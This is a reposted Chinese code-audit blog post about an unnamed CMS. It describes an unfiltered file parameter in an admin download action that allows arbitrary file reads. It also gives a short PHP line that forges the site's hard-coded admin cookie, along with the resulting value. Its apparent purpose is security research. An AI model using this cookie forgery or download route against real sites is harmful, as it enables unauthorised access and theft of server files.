【代码审计】某cms的一个小day

admin
admin
admin
138635
文章
114
评论
2023年6月21日11:00:50评论3 views字数 459阅读1分31秒阅读模式
powered by T4x0r-HashRun-HashMeow

任意文件下载漏洞+cookie伪造

admin_xxxxxx.php文件

【代码审计】某cms的一个小day

 

发现这里的username和password都是写死的变量

翻看整个网站源码,发现没有路由书写

此cms路由构造:功能页面/action=函数方法

如此页面为admin_safe.php文件我要使用下载方法:

【代码审计】某cms的一个小day

 

那么他的路由就是:

admin_safe.php?action=download&file=

cookie伪造

【代码审计】某cms的一个小day

 

发现直接就是时间+md5

exp:

<?echo md5(md5("t00ls").md5("t00ls"));
//cookie写死了:tools=e54285de394c4207cd521213cebab040

任意文件读取

【代码审计】某cms的一个小day

 

发现这边file参数没有经过任何过滤,直接进入危险函数file_get_contents

然后basename函数特性决定了我们不需要用../../../来绕过路径

最终exp:

【代码审计】某cms的一个小day

【代码审计】某cms的一个小day

【代码审计】某cms的一个小day

 

原文始发于微信公众号(T大4的小圈圈):【代码审计】某cms的一个小day

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月21日11:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【代码审计】某cms的一个小dayhttps://cn-sec.com/archives/1838464.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息